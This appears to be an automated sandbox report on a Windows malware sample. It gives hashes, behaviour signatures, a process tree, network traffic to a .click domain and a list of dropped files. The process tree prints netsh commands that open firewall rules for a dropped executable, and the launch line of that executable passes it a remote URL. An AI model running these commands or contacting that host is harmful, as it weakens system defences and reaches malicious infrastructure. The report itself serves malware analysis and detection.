
Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    27/01/2025, 04:25 UTC

General

  • Target

    8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe

  • Size

    983KB

  • MD5

    e869ad846639738812a1cb901f801120

  • SHA1

    730e00adff312d1232ea7279926b4018cf0d853b

  • SHA256

    8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c

  • SHA512

    d8bd53d5e82a3bdcdb0cb0fa5e928e476be87450ad0e4bb03046f5231f5d4f45b2457820cb918122daabf3f9d3737c2e70ed71c74dea85fdbc70ddc2d8732b08

  • SSDEEP

    24576:9GiQdsdzTxXMQCMDtUrbtoKXhn7Hu+tjqUx+kchEvoU:87gxcrNbuK0+tWOchE3

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe
    "C:\Users\Admin\AppData\Local\Temp\8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=hapjyaj dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe" enable=yes profile=public,private
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      PID:1932
    • C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=hapjyaj dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe" enable=yes profile=public,private
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      PID:2700
    • C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe
      "C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe" "http://www.marvburris.click" "C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\8197"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1492
    • C:\Windows\SysWOW64\explorer.exe
      C:\Windows\system32\explorer.exe
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2888

Network

  • flag-us
    DNS
    www.marvburris.click
    hapjyaj.exe
    Remote address:
    8.8.8.8:53
    Request
    www.marvburris.click
    IN A
    Response
    www.marvburris.click
    IN CNAME
    ppp84k45ss7ehy8ypic5x.limelightcdn.com
    ppp84k45ss7ehy8ypic5x.limelightcdn.com
    IN A
    23.106.59.18
  • flag-gb
    GET
    http://www.marvburris.click/
    hapjyaj.exe
    Remote address:
    23.106.59.18:80
    Request
    GET / HTTP/1.1
    Host: www.marvburris.click
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 27 Jan 2025 04:25:58 GMT
    Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
    X-Powered-By: PHP/5.3.13
    Content-Length: 2
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html
  • 23.106.59.18:80
    http://www.marvburris.click/
    http
    hapjyaj.exe
    254 B
    388 B
    4
    3

    HTTP Request

    GET http://www.marvburris.click/

    HTTP Response

    200
  • 8.8.8.8:53
    www.marvburris.click
    dns
    hapjyaj.exe
    66 B
    134 B
    1
    1

    DNS Request

    www.marvburris.click

    DNS Response

    23.106.59.18

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe.config

    Filesize

    257B

    MD5

    441f5c5c7933c16068a03d99bc8837c4

    SHA1

    76d1de63216c2c1218cf47a5d768a18952a1dcb3

    SHA256

    f1cac503709c2acd9ab0a7d0e48a4abf2777d16052fee68830260a78359ec72f

    SHA512

    5b8fa02b827993541841a2fd07a50e5d2c5a7f5ba35e0b282ed3a453e3f919d63f1c9432d922cc364027351c57d2b78f99f5f1469c86b581cc53acb76fdfc366

  • \Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\SelfDel.dll

    Filesize

    5KB

    MD5

    e5786e8703d651bc8bd4bfecf46d3844

    SHA1

    fee5aa4b325deecbf69ccb6eadd89bd5ae59723f

    SHA256

    d115bce0a787b4f895e700efe943695c8f1087782807d91d831f6015b0f98774

    SHA512

    d14ad43a01db19428cd8ccd2fe101750860933409b5be2eb85a3e400efcd37b1b6425ce84e87a7fe46ecabc7b91c4b450259e624c178b86e194ba7da97957ba3

  • \Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe

    Filesize

    10KB

    MD5

    9916cd804c030ab91eabab4c3d1f39f6

    SHA1

    d01995ac1f61a17211b0c942d38504e35ac89c1a

    SHA256

    6920bf36c100c838c5fcc48b3665f660e0c158449ed1a42f64cb1c054cf90eef

    SHA512

    db60ef4e82328841153114c002c7d7664c5f7b7e5a916ea106912a0fe5a9f86a4ffc0a8f062f3cc974982efbc9b0ee7ff56582efe77e34dca001fc8b79d8ccc4

  • \Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\nsExec.dll

    Filesize

    7KB

    MD5

    11092c1d3fbb449a60695c44f9f3d183

    SHA1

    b89d614755f2e943df4d510d87a7fc1a3bcf5a33

    SHA256

    2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77

    SHA512

    c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a

  • memory/1492-40-0x0000000000E60000-0x0000000000E68000-memory.dmp

    Filesize

    32KB

  • memory/2320-22-0x0000000074AD0000-0x0000000074AD9000-memory.dmp

    Filesize

    36KB

  • memory/2888-38-0x0000000000050000-0x0000000000090000-memory.dmp

    Filesize

    256KB
